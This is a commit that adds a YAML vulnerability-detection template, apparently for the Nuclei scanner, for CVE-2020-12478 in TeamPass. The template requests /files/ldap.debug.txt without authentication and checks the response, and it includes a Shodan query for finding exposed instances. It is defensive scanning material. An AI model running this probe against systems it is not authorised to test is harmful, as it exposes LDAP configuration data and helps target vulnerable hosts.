Merge pull request #5135 from arafatansari/patch-62

Create CVE-2020-12478.yaml
patch-1
Prince Chaddha 2022-08-20 22:28:32 +05:30 committed by GitHub
commit 298e76e6ad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2020-12478
info:
name: TeamPass 2.1.27.36 - Unauthenticated Access
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cve-id: CVE-2020-12478
metadata:
verified: true
shodan-query: http.html:"teampass"
tags: cve,cve2020,teampass,exposure,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Get all LDAP params'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200